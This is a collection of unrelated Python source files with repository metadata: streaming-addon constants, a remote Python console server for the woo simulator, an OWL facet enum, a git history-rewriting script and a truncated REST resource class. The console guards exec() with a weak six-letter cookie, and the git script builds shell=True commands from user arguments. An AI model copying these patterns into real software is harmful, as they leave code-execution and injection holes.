SEARCH='search', SEASONS='seasons', EPISODES='episodes', GET_SOURCES='get_sources', MANAGE_SUBS='manage_subs', GET_LIST='get_list', SET_URL_MANUAL='set_url_manual',
SET_URL_SEARCH='set_url_search', SHOW_FAVORITES='browse_favorites', SHOW_WATCHLIST='browse_watchlist', PREMIERES='premiere_calendar', SHOW_LIST='show_list',
OTHER_LISTS='other_lists', ADD_OTHER_LIST='add_other_list', PICK_SUB_LIST='pick_sub_list', PICK_FAV_LIST='pick_fav_list', UPDATE_SUBS='update_subs', CLEAN_SUBS='clean_subs',
SET_SUB_LIST='set_sub_list', SET_FAV_LIST='set_fav_list', REM_FROM_LIST='rem_from_list', ADD_TO_LIST='add_to_list', ADD_TO_LIBRARY='add_to_library', SCRAPERS='scrapers',
TOGGLE_SCRAPER='toggle_scraper', RESET_DB='reset_db', FLUSH_CACHE='flush_cache', RESOLVE_SOURCE='resolve_source', SEARCH_RESULTS='search_results',
MOVE_SCRAPER='scraper_move', EDIT_TVSHOW_ID='edit_id', SELECT_SOURCE='select_source', SHOW_COLLECTION='show_collection',
SHOW_PROGRESS='show_progress', PLAY_TRAILER='play_trailer', RENAME_LIST='rename_list', EXPORT_DB='export_db', IMPORT_DB='import_db', COPY_LIST='copy_list',
REMOVE_LIST='remove_list', ADD_TO_COLL='add_to_collection', TOGGLE_WATCHED='toggle_watched', RATE='rate', FORCE_REFRESH='force_refresh', TOGGLE_TITLE='toggle_title',
RES_SETTINGS='resolver_settings', ADDON_SETTINGS='addon_settings', TOGGLE_ALL='toggle_all', MOVE_TO='move_to', REM_FROM_COLL='rem_from_collection',
URL_EXISTS='url_exists', RECENT_SEARCH='recent_search', SAVED_SEARCHES='saved_searches', SAVE_SEARCH='save_search', DELETE_SEARCH='delete_search', SET_VIEW='set_view',
SETTINGS='settings', SHOW_VIEWS='show_views', BROWSE_VIEW='browse_view', BROWSE_URLS='browse_urls', DELETE_URL='delete_url', DOWNLOAD_SOURCE='download_source',
DIRECT_DOWNLOAD='direct_download', POPULAR='popular', RECENT='recent', DELETE_RECENT='delete_recent', CLEAR_RECENT='clear_recent', AUTH_TRAKT='auth_trakt',
AUTO_CONF='auto_config', CLEAR_SAVED='clear_saved', RESET_BASE_URL='reset_base_url', TOGGLE_TO_MENU='toggle_to_menu', LIKED_LISTS='liked_lists', MOSTS='mosts',
PLAYED='played', WATCHED='watched', COLLECTED='collected', SHOW_BOOKMARKS='show_bookmarks', DELETE_BOOKMARK='delete_bookmark', SHOW_HISTORY='show_history',
RESET_FAILS='reset_failures', MANAGE_PROGRESS='toggle_progress', AUTOPLAY='autoplay', INSTALL_THEMES='install_themes', RESET_REL_URLS='reset_rel_urls',
ANTICIPATED='anticipated')
SECTIONS = __enum(TV='TV', MOVIES='Movies')
VIDEO_TYPES = __enum(TVSHOW='TV Show', MOVIE='Movie', EPISODE='Episode', SEASON='Season')
CONTENT_TYPES = __enum(TVSHOWS='tvshows', MOVIES='movies', SEASONS='seasons', EPISODES='episodes', SOURCES='sources')
TRAKT_SECTIONS = {SECTIONS.TV: 'shows', SECTIONS.MOVIES: 'movies'}
TRAKT_SORT = __enum(TITLE='title', ACTIVITY='activity', MOST_COMPLETED='most-completed', LEAST_COMPLETED='least-completed', RECENTLY_AIRED='recently-aired',
PREVIOUSLY_AIRED='previously-aired')
TRAKT_LIST_SORT = __enum(RANK='rank', RECENTLY_ADDED='added', TITLE='title', RELEASE_DATE='released', RUNTIME='runtime', POPULARITY='popularity',
PERCENTAGE='percentage', VOTES='votes')
TRAKT_SORT_DIR = __enum(ASCENDING='asc', DESCENDING='desc')
SORT_MAP = [TRAKT_SORT.ACTIVITY, TRAKT_SORT.TITLE, TRAKT_SORT.MOST_COMPLETED, TRAKT_SORT.LEAST_COMPLETED, TRAKT_SORT.RECENTLY_AIRED,
TRAKT_SORT.PREVIOUSLY_AIRED]
QUALITIES = __enum(LOW='Low', MEDIUM='Medium', HIGH='High', HD720='HD720', HD1080='HD1080')
DIRS = __enum(UP='up', DOWN='down')
WATCHLIST_SLUG = 'watchlist_slug'
COLLECTION_SLUG = 'collection_slug'
SEARCH_HISTORY = 10
DEFAULT_EXT = '.mpg'
CHUNK_SIZE = 512 * 1024
PROGRESS = __enum(OFF=0, WINDOW=1, BACKGROUND=2)
FORCE_NO_MATCH = '***FORCE_NO_MATCH***'
SHORT_MONS = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
ACTIONS = __enum(ADD='add', REMOVE='remove')
TRIG_DB_UPG = False
# sort keys need to be defined such that "best" have highest values
# unknown (i.e. None) is always worst
SORT_KEYS = {}
SORT_KEYS['quality'] = {None: 0, QUALITIES.LOW: 1, QUALITIES.MEDIUM: 2, QUALITIES.HIGH: 3, QUALITIES.HD720: 4, QUALITIES.HD1080: 5}
SORT_LIST = ['none', 'source', 'quality', 'views', 'rating', 'direct', 'debrid']
SORT_SIGNS = {'0': -1, '1': 1} # 0 = Best to Worst; 1 = Worst to Best
HOURS_LIST = {}
HOURS_LIST[MODES.UPDATE_SUBS] = [.5, 1] + range(2, 25)
LONG_AGO = '1970-01-01 23:59:00.000000'
TEMP_ERRORS = [500, 502, 503, 504, 520, 521, 522, 524]
SRT_SOURCE = 'addic7ed'
DISABLE_SETTINGS = __enum(OFF='0', PROMPT='1', ON='2')
BLOG_Q_MAP = {}
BLOG_Q_MAP[QUALITIES.LOW] = [' CAM ', ' TS ', ' R6 ', 'CAMRIP']
BLOG_Q_MAP[QUALITIES.MEDIUM] = ['-XVID', '-MP4', 'MEDIUM']
BLOG_Q_MAP[QUALITIES.HIGH] = ['HDRIP', 'DVDRIP', 'BRRIP', 'BDRIP', '480P', 'HDTV']
BLOG_Q_MAP[QUALITIES.HD720] = ['720', 'HDTS', ' HD ']
BLOG_Q_MAP[QUALITIES.HD1080] = ['1080']
HOST_Q = {}
HOST_Q[QUALITIES.LOW] = ['youwatch', 'allmyvideos', 'played.to', 'gorillavid']
HOST_Q[QUALITIES.MEDIUM] = ['primeshare', 'exashare', 'bestreams', 'flashx', 'vidto', 'vodlocker', 'vidzi', 'vidbull', 'realvid', 'nosvideo',
'daclips', 'sharerepo', 'zalaa', 'filehoot', 'vshare.io']
HOST_Q[QUALITIES.HIGH] = ['vidspot', 'mrfile', 'divxstage', 'streamcloud', 'mooshare', 'novamov', 'mail.ru', 'vid.ag', 'thevideo']
HOST_Q[QUALITIES.HD720] = ['thefile', 'sharesix', 'filenuke', 'vidxden', 'movshare', 'nowvideo', 'vidbux', 'streamin.to', 'allvid.ch']
HOST_Q[QUALITIES.HD1080] = ['hugefiles', '180upload', 'mightyupload', 'videomega', 'allmyvideos']
Q_ORDER = {QUALITIES.LOW: 1, QUALITIES.MEDIUM: 2, QUALITIES.HIGH: 3, QUALITIES.HD720: 4, QUALITIES.HD1080: 5}
IMG_SIZES = ['full', 'medium', 'thumb']
USER_AGENT = "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
BR_VERS = [
['%s.0' % i for i in xrange(18, 43)],
['37.0.2062.103', '37.0.2062.120', '37.0.2062.124', '38.0.2125.101', '38.0.2125.104', '38.0.2125.111', '39.0.2171.71', '39.0.2171.95', '39.0.2171.99', '40.0.2214.93', '40.0.2214.111',
'40.0.2214.115', '42.0.2311.90', '42.0.2311.135', '42.0.2311.152', '43.0.2357.81', '43.0.2357.124', '44.0.2403.155', '44.0.2403.157', '45.0.2454.101', '45.0.2454.85', '46.0.2490.71',
'46.0.2490.80', '46.0.2490.86', '47.0.2526.73', '47.0.2526.80'],
['11.0']]
WIN_VERS = ['Windows NT 10.0', 'Windows NT 7.0', 'Windows NT 6.3', 'Windows NT 6.2', 'Windows NT 6.1', 'Windows NT 6.0', 'Windows NT 5.1', 'Windows NT 5.0']
FEATURES = ['; WOW64', '; Win64; IA64', '; Win64; x64', '']
RAND_UAS = ['Mozilla/5.0 ({win_ver}{feature}; rv:{br_ver}) Gecko/20100101 Firefox/{br_ver}',
'Mozilla/5.0 ({win_ver}{feature}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{br_ver} Safari/537.36',
'Mozilla/5.0 ({win_ver}{feature}; Trident/7.0; rv:{br_ver}) like Gecko']
|
gpl-2.0
| 5,276,069,409,270,380,000
| 71.813084
| 187
| 0.671416
| false
| 2.674562
| false
| false
| false
|
woodem/woo
|
py/remote.py
|
1
|
7933
|
# encoding: utf-8
# 2008-2009 © Václav Šmilauer <eudoxos@arcig.cz>
"""
Remote connections to woo: authenticated python command-line over telnet and anonymous socket for getting some read-only information about current simulation.
These classes are used internally in gui/py/PythonUI_rc.py and are not intended for direct use.
"""
import socketserver,xmlrpc.client,socket
import sys,time,os,math
useQThread=False
"Set before using any of our classes to use QThread for background execution instead of the standard thread module. Mixing the two (in case the qt UI is running, for instance) does not work well."
plotImgFormat,plotImgMimetype='png','image/png'
#plotImgFormat,plotImgMimetype='svg','image/svg+xml'
bgThreads=[] # needed to keep background threads alive
class InfoProvider(object):
def basicInfo(self):
import woo
S=woo.master.scene
ret=dict(step=S.step,dt=S.dt,stopAtStep=S.stopAtStep,stopAtTime=S.stopAtTime,time=S.time,id=S.tags['id'] if 'id' in S.tags else None,title=S.tags['title'] if 'title' in S.tags else None,threads=woo.master.numThreads,numBodies=(len(S.dem.par) if S.hasDem else -1),numIntrs=(len(S.dem.con) if S.hasDem else -1),PID=os.getpid())
sys.stdout.flush(); sys.stderr.flush()
return ret
def plot(self):
try:
import woo
S=woo.master.scene
if len(S.plot.plots)==0: return None
fig=S.plot.plot(subPlots=True,noShow=True)[0]
img=woo.master.tmpFilename()+'.'+plotImgFormat
sqrtFigs=math.sqrt(len(S.plot.plots))
fig.set_size_inches(5*sqrtFigs,7*sqrtFigs)
fig.savefig(img)
f=open(img,'rb'); data=f.read(); f.close(); os.remove(img)
# print 'returning %s (%d bytes read)'%(plotImgFormat,len(data))
return xmlrpc.client.Binary(data)
except:
print('Error updating plots:')
import traceback
traceback.print_exc()
return None
class PythonConsoleSocketEmulator(socketserver.BaseRequestHandler):
"""Class emulating python command-line over a socket connection.
The connection is authenticated by requiring a cookie.
Only connections from localhost (127.0.0.*) are allowed.
"""
def setup(self):
if not self.client_address[0].startswith('127.0.0'):
print("TCP Connection from non-127.0.0.* address %s rejected"%self.client_address[0])
return
print(self.client_address, 'connected!')
self.request.send('Enter auth cookie: ')
def tryLogin(self):
if self.request.recv(1024).rstrip()==self.server.cookie:
self.server.authenticated+=[self.client_address]
self.request.send("Woo / TCP\n(connected from %s:%d)\n>>>"%(str(self.client_address[0]),self.client_address[1]))
return True
else:
import time
time.sleep(5)
print("invalid cookie")
return False
def displayhook(self,s):
import pprint
self.request.send(pprint.pformat(s))
def handle(self):
if self.client_address not in self.server.authenticated and not self.tryLogin(): return
import code,io,traceback
buf=[]
while True:
data = self.request.recv(1024).rstrip()
if data=='\x04' or data=='exit' or data=='quit': # \x04 == ^D
return
buf.append(data)
orig_displayhook,orig_stdout=sys.displayhook,sys.stdout
sio=io.StringIO()
continuation=False
#print "buffer:",buf
try:
comp=code.compile_command('\n'.join(buf))
if comp:
sys.displayhook=self.displayhook
sys.stdout=sio
exec(comp)
self.request.send(sio.getvalue())
buf=[]
else:
self.request.send('... '); continuation=True
except:
self.request.send(traceback.format_exc())
buf=[]
finally:
sys.displayhook,sys.stdout=orig_displayhook,orig_stdout
if not continuation: self.request.send('\n>>> ')
def finish(self):
print(self.client_address, 'disconnected!')
self.request.send('\nBye ' + str(self.client_address) + '\n')
def _runInBackground(func):
if useQThread:
import woo.config
from PyQt5.QtCore import QThread
class WorkerThread(QThread):
def __init__(self,func_): QThread.__init__(self); self.func=func_
def run(self): self.func()
wt=WorkerThread(func)
wt.start()
global bgThreads; bgThreads.append(wt)
else:
import _thread; _thread.start_new_thread(func,())
class GenericTCPServer(object):
"Base class for socket server, handling port allocation, initial logging and thead backgrounding."
def __init__(self,handler,title,cookie=True,minPort=9000,host='',maxPort=65536,background=True):
import socket, random, sys
self.port=-1
self.host=host
tryPort=minPort
if maxPort==None: maxPort=minPort
while self.port==-1 and tryPort<=maxPort:
try:
self.server=socketserver.ThreadingTCPServer((host,tryPort),handler)
self.port=tryPort
if cookie:
self.server.cookie=''.join([i for i in random.sample('woosucks',6)])
self.server.authenticated=[]
sys.stderr.write(title+" on %s:%d, auth cookie `%s'\n"%(host if host else 'localhost',self.port,self.server.cookie))
else:
sys.stderr.write(title+" on %s:%d\n"%(host if host else 'localhost',self.port))
if background: _runInBackground(self.server.serve_forever)
else: self.server.serve_forever()
except socket.error:
tryPort+=1
if self.port==-1: raise RuntimeError("No free port to listen on in range %d-%d"%(minPort,maxPort))
def runServers(xmlrpc=False,tcpPy=False):
"""Run python telnet server and info socket. They will be run at localhost on ports 9000 (or higher if used) and 21000 (or higer if used) respectively.
The python telnet server accepts only connection from localhost,
after authentication by random cookie, which is printed on stdout
at server startup.
The info socket provides read-only access to several simulation parameters
at runtime. Each connection receives pickled dictionary with those values.
This socket is primarily used by woo-multi batch scheduler.
"""
if tcpPy:
import woo.runtime
srv=GenericTCPServer(handler=woo.remote.PythonConsoleSocketEmulator,title='TCP python prompt',cookie=True,minPort=9000)
woo.runtime.cookie=srv.server.cookie
if xmlrpc:
from xmlrpc.server import SimpleXMLRPCServer
port,maxPort=21000,65535 # minimum port number
while port<maxPort:
try:
info=SimpleXMLRPCServer(('',port),logRequests=False,allow_none=True); break
except socket.error: port+=1
if port==maxPort: raise RuntimeError("No free port to listen on in range 21000-%d"%maxPort)
# register methods, as per http://docs.python.org/library/simplexmlrpcserver.html#simplexmlrpcserver-example
info.register_instance(InfoProvider()) # gets all defined methods by introspection
#prov=InfoProvider()
#for m in prov.exposedMethods(): info.register_function(m)
_runInBackground(info.serve_forever)
print('XMLRPC info provider on http://localhost:%d'%port)
sys.stdout.flush()
#if __name__=='__main__':
# p=GenericTCPServer(PythonConsoleSocketEmulator,'Python TCP server',background=False)
# #while True: time.sleep(2)
|
gpl-2.0
| 5,875,989,687,096,059,000
| 42.565934
| 333
| 0.627696
| false
| 3.903988
| false
| false
| false
|
patrickwestphal/owlapy
|
owlapy/vocab/owlfacet.py
|
1
|
2515
|
from enum import Enum
from .namespaces import Namespaces
from owlapy.model import IRI
from owlapy.util.decorators import ClassProperty
class OWLFacet(Enum):
LENGTH = (Namespaces.XSD, 'length', 'length')
MIN_LENGTH = (Namespaces.XSD, 'minLength', 'minLength')
MAX_LENGTH = (Namespaces.XSD, 'maxLength', 'maxLength')
PATTERN = (Namespaces.XSD, 'pattern', 'pattern')
MIN_INCLUSIVE = (Namespaces.XSD, 'minInclusive', '>=')
MIN_EXCLUSIVE = (Namespaces.XSD, 'minExclusive', '>')
MAX_INCLUSIVE = (Namespaces.XSD, 'maxInclusive', '<=')
MAX_EXCLUSIVE = (Namespaces.XSD, 'maxExclusive', '<')
TOTAL_DIGITS = (Namespaces.XSD, 'totalDigits', 'totalDigits')
FRACTION_DIGITS = (Namespaces.XSD, 'fractionDigits', 'fractionDigits')
LANG_RANGE = (Namespaces.RDF, 'langRange', 'langRange')
def __init__(self, ns, short_form, symbolic_form):
"""
:param ns: an owlapy.vocab.namespaces.Namespaces object
:param short_form: a string containing the short form
:param symbolic_form: a string containing the symbolic form
:return:
"""
self.iri = IRI(str(ns), short_form)
self.short_form = short_form
self.symbolic_form = symbolic_form
self.prefixed_name = ns.prefix_name + ':' + short_form
@ClassProperty
@classmethod
def FACET_IRIS(cls):
if not hasattr(cls, '_FACET_IRIS'):
cls._FACET_IRIS = set()
for facet in cls:
cls._FACET_IRIS.add(facet.iri)
return cls._FACET_IRIS
@classmethod
def get_facet(cls, iri):
"""
:param iri: an owlapy.model.IRI object
"""
for vocabulary in cls:
if vocabulary.iri == iri:
return vocabulary
@classmethod
def get_facet_by_short_name(cls, short_form):
"""
:param short_form: a string containing the short name
"""
for vocabulary in cls:
if vocabulary.short_form == short_form:
return vocabulary
@classmethod
def get_facet_by_symbolic_name(cls, symbolic_form):
for vocabulary in cls:
if vocabulary.symbolic_form == symbolic_form:
return vocabulary
@classmethod
def get_facets(cls):
"""
:return: a set of strings containing the symbolic form if the defined
facets
"""
result = set()
for facet in cls:
result.add(facet.symbolic_form)
return result
|
gpl-3.0
| -992,769,188,573,107,000
| 31.675325
| 77
| 0.603579
| false
| 3.714919
| false
| false
| false
|
twotwo/tools-python
|
git-filter-branch/main.py
|
1
|
5551
|
# -*- coding: utf-8 -*-
############################################################
#
# Read & Modify commits of a Git Reposotory
#
############################################################
import os
import sys
import argparse
import subprocess
import datetime
from git import Repo, RefLog
import json
from loguru_helper import message_logger, event_logger, emit_logger
class GitModifier(object):
def __init__(self, repo_path):
self.repo = Repo(repo_path)
@staticmethod
def format(obj):
"""
refer to https://git-scm.com/docs/git-commit-tree#_commit_information
"""
template = """
if test "$GIT_COMMIT" = "{commit_id}"
then
GIT_AUTHOR_NAME="{user}"
GIT_AUTHOR_EMAIL="{email}"
GIT_AUTHOR_DATE="{date}"
GIT_COMMITTER_NAME="{user}"
GIT_COMMITTER_EMAIL="{email}"
GIT_COMMITTER_DATE="{date}"
fi
"""
return template.format(commit_id=obj.get('id'),
date=obj.get('date'),
user=obj.get('author').get('name'),
email=obj.get('author').get('email'))
@staticmethod
def filter_branch(path: str, msg: str, verbose=False):
"""
https://git-scm.com/docs/git-filter-branch
"""
cmd = f"git -C {path} filter-branch -f --env-filter {msg}"
if verbose:
event_logger.info(f"executing...\n{cmd}")
return GitModifier.execute(cmd)
@staticmethod
def execute(cmd: str) -> str:
"""Excuete a shell command, get result
"""
subprocess.run(cmd, shell=True, check=True)
return ''
# with subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True) as proc:
# lines = proc.stdout.readlines()
# return '\n'.join([line.decode("utf-8").strip() for line in lines])
def chunks(l: list, n: int):
"""
Yield successive n-sized chunks from l.
:param list to devide
:n range to devide
"""
for i in range(0, len(l), n):
yield l[i:i + n]
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Console2RabbitMQ')
parser.add_argument('-p', dest='path', type=str, default="/var/lib/repo")
parser.add_argument('--export', dest='export', action='store_true')
parser.add_argument('--modify', dest='modify', action='store_true')
parser.add_argument('--verbose', dest='verbose', action='store_true')
parser.add_argument('-r', dest='range', type=int, default=20)
parser.add_argument('-f', dest='file', type=str, default="commits.json")
parser.add_argument('-m', dest='match', type=str,
default=None, help="matching email address to change")
parser.add_argument('-e', dest='email', type=str, default=None,
help="change matching email to this email")
parser.add_argument('-n', dest='name', type=str, default=None,
help="change matching email to this name")
args = parser.parse_args()
# event_logger.warning(f'args={args}')
if(args.export):
repo = Repo(args.path)
event_logger.opt(ansi=True).info(f'[{args.path}] begin export ...')
if os.path.exists(args.file):
event_logger.error(f"file [{args.file}] exist, cancel export")
sys.exit(0)
f = open(args.file, 'w')
for log in repo.iter_commits():
committer = log.committer
obj = {'id': log.hexsha,
'author': {'email': committer.email, 'name': committer.name},
'date': str(log.authored_datetime),
'message': str(log.message.strip())}
# emit_logger.info(f'{obj}')
f.write(json.dumps(obj)+'\n')
if args.verbose:
emit_logger.opt(ansi=True).debug(
f'<level>{log.hexsha}</level>\t<cyan>{log.authored_datetime}</cyan>\t<blue>{committer.email}</blue>\t<green>{log.message.strip()}</green>')
f.close()
event_logger.opt(ansi=True).info(f'write to {args.file}')
if(args.modify):
envs = []
event_logger.opt(ansi=True).info(f"read config [{args.file}]...")
with open(args.file) as f:
for line in f:
obj = json.loads(line)
if args.verbose:
event_logger.opt(ansi=True).info(
f"<level>{obj.get('id')}</level>\t<cyan>{obj.get('date')}</cyan>\t<blue>{obj.get('author').get('email')}</blue>\t<green>{obj.get('message')}</green>")
envs.append(GitModifier.format(obj))
event_logger.opt(ansi=True).info("begin filter-branch ...")
for chunk in chunks(envs, args.range):
emit_logger.opt(ansi=True).debug(
GitModifier.filter_branch(args.path, f"'{''.join(chunk)}' -- --all", args.verbose))
if(args.match):
template = """git -C {path} filter-branch -f --env-filter '
if test "$GIT_COMMITTER_EMAIL" = "{match_email}"
then
GIT_AUTHOR_NAME="{name}"
GIT_AUTHOR_EMAIL="{email}"
GIT_COMMITTER_NAME="{name}"
GIT_COMMITTER_EMAIL="{email}"
fi
' -- --all
"""
command = template.format(
path=args.path,
match_email=args.match,
name=args.name,
email=args.email)
if args.verbose:
event_logger.info(f"executing...\n{command}")
GitModifier.execute(command)
|
mit
| 9,088,962,088,859,095,000
| 36.255034
| 174
| 0.542064
| false
| 3.740566
| false
| false
| false
|
bruth/restlib2
|
restlib2/resources.py
|
1
|
35324
|
import io
import time
import hashlib
import collections
from six import add_metaclass
# http://mail.python.org/pipermail/python-list/2010-March/1239510.html
from calendar import timegm
from datetime import datetime, timedelta
from django.conf import settings
from django.http import HttpResponse, HttpRequest
from django.utils.http import http_date, parse_http_date, parse_etags, \
quote_etag
from django.utils.cache import patch_cache_control
from .http import codes, methods
from .serializers import serializers
from .mixins import TemplateResponseMixin
from . import mimeparse
EPOCH_DATE = datetime(1970, 1, 1, 0, 0, 0)
MAX_CACHE_AGE = 60 * 60 * 24 * 30
# Convenience function for checking for existent, callable methods
usable = lambda x, y: isinstance(getattr(x, y, None), collections.Callable)
try:
str = unicode
except NameError:
pass
def no_content_response(response):
"Cautious assessment of the response body for no content."
if not hasattr(response, '_container'):
return True
if response._container is None:
return True
if isinstance(response._container, (list, tuple)):
if len(response._container) == 1 and not response._container[0]:
return True
return False
def get_content_length(request):
try:
return int(request.META.get('CONTENT_LENGTH'))
except (ValueError, TypeError):
return 0
class UncacheableResponse(HttpResponse):
"Response class that will never be cached."
def __init__(self, *args, **kwargs):
super(UncacheableResponse, self).__init__(*args, **kwargs)
self['Expires'] = 0
patch_cache_control(self, no_cache=True, must_revalidate=True,
max_age=0)
# ## Resource Metaclass
# Sets up a few helper components for the `Resource` class.
class ResourceMetaclass(type):
def __new__(cls, name, bases, attrs):
# Create the new class as is to start. Subclass attributes can be
# checked for in `attrs` and handled as necessary relative to the base
# classes.
new_cls = type.__new__(cls, name, bases, attrs)
# If `allowed_methods` is not defined explicitly in attrs, this
# could mean one of two things: that the user wants it to inherit
# from the parent class (if exists) or for it to be set implicitly.
# The more explicit (and flexible) behavior will be to not inherit
# it from the parent class, therefore the user must explicitly
# re-set the attribute.
if 'allowed_methods' not in attrs or not new_cls.allowed_methods:
allowed_methods = []
for method in methods:
if usable(new_cls, method.lower()):
allowed_methods.append(method)
# If the attribute is defined in this subclass, ensure all methods that
# are said to be allowed are actually defined and callable.
else:
allowed_methods = list(new_cls.allowed_methods)
for method in allowed_methods:
if not usable(new_cls, method.lower()):
msg = 'The {0} method is not defined for the resource {1}'
raise ValueError(msg.format(method, new_cls.__name__))
# If `GET` is not allowed, remove `HEAD` method.
if 'GET' not in allowed_methods and 'HEAD' in allowed_methods:
allowed_methods.remove('HEAD')
new_cls.allowed_methods = tuple(allowed_methods)
if not new_cls.supported_content_types:
new_cls.supported_content_types = new_cls.supported_accept_types
if not new_cls.supported_patch_types:
new_cls.supported_patch_types = new_cls.supported_content_types
return new_cls
def __call__(cls, *args, **kwargs):
"""Tests to see if the first argument is an HttpRequest object, creates
an instance, and calls it with the arguments.
"""
if args and isinstance(args[0], HttpRequest):
instance = super(ResourceMetaclass, cls).__call__()
return instance.__call__(*args, **kwargs)
return super(ResourceMetaclass, cls).__call__(*args, **kwargs)
# ## Resource
# Comprehensive ``Resource`` class which implements sensible request
# processing. The process flow is largely derived from Alan Dean's
# [status code activity diagram][0].
#
# ### Implementation Considerations
# [Section 2][1] of the HTTP/1.1 specification states:
#
# > The methods GET and HEAD MUST be supported by all general-purpose servers.
# > All other methods are OPTIONAL;
#
# The `HEAD` handler is already implemented on the `Resource` class, but
# requires the `GET` handler to be implemented. Although not required, the
# `OPTIONS` handler is also implemented.
#
# Response representations should follow the rules outlined in [Section
# 5.1][2].
#
# [Section 6.1][3] defines that `GET`, `HEAD`, `OPTIONS` and `TRACE` are
# considered _safe_ methods, thus ensure the implementation of these methods do
# not have any side effects. In addition to the safe methods, `PUT` and
# `DELETE` are considered _idempotent_ which means subsequent identical
# requests to the same resource does not result it different responses to
# the client.
#
# Request bodies on `GET`, `HEAD`, `OPTIONS`, and `DELETE` requests are
# ignored. The HTTP spec does not define any semantics surrounding this
# situtation.
#
# Typical uses of `POST` requests are described in [Section 6.5][4], but in
# most cases should be assumed by clients as _black box_, neither safe nor
# idempotent. If updating an existing resource, it is more appropriate to use
# `PUT`.
#
# [Section 7.2.1][5] defines that `GET`, `HEAD`, `POST`, and 'TRACE' should
# have a payload for status code of 200 OK. If not supplied, a different 2xx
# code may be more appropriate.
#
# [0]: http://code.google.com/p/http-headers-status/downloads/detail?name
# =http-headers-status%20v3%20draft.png
# [1]: http://tools.ietf.org/html/draft-ietf-httpbis-p2-semantics-18#section-2
# [2]: http://tools.ietf.org/html/draft-ietf-httpbis-p2-semantics-18#section
# -5.1
# [3]: http://tools.ietf.org/html/draft-ietf-httpbis-p2-semantics-18#section
# -6.1
# [4]: http://tools.ietf.org/html/draft-ietf-httpbis-p2-semantics-18#section
# -6.5
@add_metaclass(ResourceMetaclass)
class Resource(object):
# ### Service Availability
# Toggle this resource as unavailable. If `True`, the service
# will be unavailable indefinitely. If an integer or datetime is
# used, the `Retry-After` header will set. An integer can be used
# to define a seconds delta from the current time (good for unexpected
# downtimes). If a datetime is set, the number of seconds will be
# calculated relative to the current time (good for planned downtime).
unavailable = False
# ### Allowed Methods
# If `None`, the allowed methods will be determined based on the resource
# methods define, e.g. `get`, `put`, `post`. A list of methods can be
# defined explicitly to have not expose defined methods.
allowed_methods = None
# ### Request Rate Limiting
# Enforce request rate limiting. Both `rate_limit_count` and
# `rate_limit_seconds` must be defined and not zero to be active.
# By default, the number of seconds defaults to 1 hour, but the count
# is `None`, therefore rate limiting is not enforced.
rate_limit_count = None
rate_limit_seconds = 60 * 60
# ### Max Request Entity Length
# If not `None`, checks if the request entity body is too large to
# be processed.
max_request_entity_length = None
# ### Supported _Accept_ Mimetypes
# Define a list of mimetypes supported for encoding response entity
# bodies. Default to `('application/json',)`
# _See also: `supported_content_types`_
supported_accept_types = ('application/json',)
# ### Supported _Content-Type_ Mimetypes
# Define a list of mimetypes supported for decoding request entity bodies.
# This is independent of the mimetypes encoders for request bodies.
# Defaults to mimetypes defined in `supported_accept_types`.
supported_content_types = None
# ### Supported PATCH Mimetypes
# Define a list of mimetypes supported for decoding request entity bodies
# for `PATCH` requests. Defaults to mimetypes defined in
# `supported_content_types`.
supported_patch_types = None
# ### Validation Caching
# #### Require Conditional Request
# If `True`, `PUT` and `PATCH` requests are required to have a conditional
# header for verifying the operation applies to the current state of the
# resource on the server. This must be used in conjunction with either
# the `use_etags` or `use_last_modified` option to take effect.
require_conditional_request = False
# #### Use ETags
# If `True`, the `ETag` header will be set on responses and conditional
# requests are supported. This applies to _GET_, _HEAD_, _PUT_, _PATCH_
# and _DELETE_ requests. Defaults to Django's `USE_ETAGS` setting.
use_etags = settings.USE_ETAGS
# #### Use Last Modified
# If `True`, the `Last-Modified` header will be set on responses and
# conditional requests are supported. This applies to _GET_, _HEAD_, _PUT_,
# _PATCH_ and _DELETE_ requests.
use_last_modified = False
# ### Expiration Caching
# Define a maximum cache age in seconds or as a date this resource is valid
# for. If an integer in seconds is specified, the 'Cache-Control' 'max-age'
# attribute will be used. If a timedelta is specified, the 'Expires' header
# will be used with a calculated date. Both of these mechanisms are
# non-conditional and are considered _strong_ cache headers. Clients (such
# as browsers) will not send send a conditional request until the resource
# has expired locally, this is sometimes referred to as a _cold cache_.
# Most dynamic resources will want to set this to 0, unless it's a
# read-only resource that is ok to be a bit stale.
# - http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.3
# - http://www.odino.org/301/rest-better-http-cache
# - http://www.subbu.org/blog/2005/01/http-caching
cache_max_age = None
# Defines the cache_type of the response, public, private or no-cache
# - http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.1
cache_type = None
# Applies to cache servers. No part of the response will be cached by
# downstream cached.
# - http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.2
cache_no_store = False
# Applies to cache servers. This ensures a cache always revalidates with
# the origin server before responding to a client request.
# - http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.4
cache_must_revalidate = False
def __init__(self, **kwargs):
for key in kwargs:
# Not methods nor methods
if key in self.allowed_methods or isinstance(
getattr(self, key, None), collections.Callable):
raise TypeError(
'No HTTP handlers nor methods can be overriden.')
if not hasattr(self, key):
tpl = '{0} is not a valid keyword argument for this resource.'
raise TypeError(tpl.format(key))
setattr(self, key, kwargs[key])
# ## Initialize Once, Process Many
# Every `Resource` class can be initialized once since they are stateless
# (and thus thread-safe).
def __call__(self, request, *args, **kwargs):
return self.dispatch(request, *args, **kwargs)
def dispatch(self, request, *args, **kwargs):
# Process the request. This includes all the necessary checks prior to
# actually interfacing with the resource itself.
response = self.process_request(request, *args, **kwargs)
if not isinstance(response, HttpResponse):
# Attempt to process the request given the corresponding
# `request.method` handler.
method_handler = getattr(self, request.method.lower())
response = method_handler(request, *args, **kwargs)
if not isinstance(response, HttpResponse):
# If the return value of the handler is not a response, pass
# the return value into the render method.
response = self.render(request, response, args=args,
kwargs=kwargs)
# Process the response, check if the response is overridden and
# use that instead.
return self.process_response(request, response)
def render(self, request, content=None, status=codes.ok, content_type=None,
args=None, kwargs=None):
"Renders the response based on the content returned from the handler."
response = HttpResponse(status=status, content_type=content_type)
if content is not None:
if not isinstance(content, (str, bytes, io.IOBase)):
